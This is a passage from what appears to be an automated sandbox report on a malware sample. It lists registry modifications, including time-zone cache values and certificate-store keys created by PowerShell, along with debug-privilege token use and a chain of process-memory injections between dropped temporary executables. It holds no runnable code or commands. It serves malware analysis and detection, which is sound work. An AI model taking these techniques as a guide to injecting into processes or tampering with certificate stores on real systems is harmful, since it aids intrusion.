Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A

Modifies data under HKEY_USERS

Description Indicator Process Target
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-671 = "AUS Eastern Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-751 = "Tonga Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-832 = "SA Eastern Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-11 = "Azores Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2432 = "Cuba Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-331 = "E. Europe Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-1891 = "Russia TZ 3 Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2182 = "Astrakhan Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-385 = "Namibia Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-241 = "Samoa Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-1972 = "Belarus Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-682 = "E. Australia Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-602 = "Taipei Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-591 = "Malay Peninsula Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-1501 = "Turkey Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2372 = "Easter Island Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-351 = "FLE Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-232 = "Hawaiian Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2431 = "Cuba Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-42 = "E. South America Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2942 = "Sao Tome Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-448 = "Azerbaijan Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-1841 = "Russia TZ 4 Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-384 = "Namibia Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2141 = "Transbaikal Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-161 = "Central Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2791 = "Novosibirsk Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-842 = "Argentina Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-231 = "Hawaiian Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-622 = "Korea Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-411 = "E. Africa Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2511 = "Lord Howe Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-215 = "Pacific Standard Time (Mexico)" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-1831 = "Russia TZ 2 Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-242 = "Samoa Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-111 = "Eastern Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-31 = "Mid-Atlantic Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-771 = "Montevideo Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-92 = "Pacific SA Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-12 = "Azores Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-32 = "Mid-Atlantic Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-1931 = "Russia TZ 11 Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-449 = "Azerbaijan Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-661 = "Cen. Australia Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2341 = "Haiti Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-631 = "Tokyo Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-1862 = "Russia TZ 6 Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-212 = "Pacific Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2591 = "Tocantins Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-1971 = "Belarus Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-332 = "E. Europe Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-542 = "Myanmar Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-1871 = "Russia TZ 7 Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\1fX89KT6.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\1fX89KT6.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\3qu90Pt.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\3qu90Pt.exe N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Suspicious behavior: GetForegroundWindowSpam

Description Indicator Process Target
N/A N/A N/A N/A

Suspicious behavior: MapViewOfSection

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\3qu90Pt.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\toolspub2.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\1fX89KT6.exe N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\A5C5.exe N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\AAB9.exe N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A

Suspicious use of SendNotifyMessage

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 4368 wrote to memory of 4120 N/A C:\Users\Admin\AppData\Local\Temp\file.exe C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\VH4vX77.exe
PID 4368 wrote to memory of 4120 N/A C:\Users\Admin\AppData\Local\Temp\file.exe C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\VH4vX77.exe
PID 4368 wrote to memory of 4120 N/A C:\Users\Admin\AppData\Local\Temp\file.exe C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\VH4vX77.exe
PID 4120 wrote to memory of 2196 N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\VH4vX77.exe C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\ro8sA21.exe
PID 4120 wrote to memory of 2196 N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\VH4vX77.exe C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\ro8sA21.exe
PID 4120 wrote to memory of 2196 N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\VH4vX77.exe C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\ro8sA21.exe
PID 2196 wrote to memory of 2744 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\ro8sA21.exe C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\DO2BB55.exe
PID 2196 wrote to memory of 2744 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\ro8sA21.exe C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\DO2BB55.exe
PID 2196 wrote to memory of 2744 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\ro8sA21.exe C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\DO2BB55.exe
PID 2744 wrote to memory of 3408 N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\DO2BB55.exe C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\TK1xO34.exe
PID 2744 wrote to memory of 3408 N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\DO2BB55.exe C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\TK1xO34.exe
PID 2744 wrote to memory of 3408 N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\DO2BB55.exe C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\TK1xO34.exe
PID 3408 wrote to memory of 2716 N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\TK1xO34.exe C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\1fX89KT6.exe
